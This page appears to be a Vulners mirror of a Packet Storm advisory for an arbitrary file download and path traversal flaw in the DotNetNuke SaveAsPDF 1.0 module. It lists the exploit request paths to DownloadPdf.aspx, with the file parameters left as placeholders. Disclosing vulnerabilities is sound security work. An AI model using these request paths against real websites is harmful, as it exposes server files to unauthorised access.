Vulners
Lucene search
DotNetNuke SaveAsPDF 1.0 Arbitrary File Download
🗓️ 11 Mar 2019 00:00:00Reported by KingSkrupellosType 
packetstorm🔗 packetstormsecurity.com👁 36 Views
`####################################################################
# Exploit Title : DotNetNuke SaveAsPDF Modules 1.0 Arbitrary File Download
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 12/03/2019
# Vendor Homepage : bizmodules.net ~ dnnsoftware.com
# Software Information Links :
bizmodules.net/Products/SaveasPDF/tabid/188/Default.aspx
bizmodules.net/portals/0/downloads/sap.pdf
# Software Version : 1.0 ~ Compatible with DNN 4.5.x and 5.0.x
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Vulnerability Type :
CWE-200 [ Information Exposure ]
CWE-23 [ Relative Path Traversal ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Description about Software :
***************************
Save As PDF (SAP) is a DotNetNuke (DNN) application designed to work in DotNetNuke
websites only. SAP is used to convert a DotNetNuke page to Adobe PDF format, including
texts, pictures and even flash contents.
####################################################################
# Impact :
***********
* DotNetNuke SaveAsPDF Modules 1.0 is prone to a vulnerability that lets attackers download
arbitrary files because the application fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to download arbitrary files within the context of the
web server process and obtain potentially sensitive informations and it works for
open redirection vulnerability.
* An information exposure is the intentional or unintentional disclosure of information to an actor
that is not explicitly authorized to have access to that information.
* The software uses external input to construct a pathname that should be within a
restricted directory, but it does not properly neutralize sequences such as ".." that
can resolve to a location that is outside of that directory.
####################################################################
# Arbitrary File Download Exploit :
*******************************
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?url=https://www.[RANDOMWEBSITE].gov
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&Url=[FILENAME]
/DesktopModules/SaveAsPDF/DownloadPdf.aspx?Name=[ID-NUMBER]&file=[FILENAME]
Note : It can download any random website as pdf file in to your computer and
it downloads a system files from DNNSoftware.
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Mar 2019 00:00Current
0.2Low risk
Vulners AI Score0.2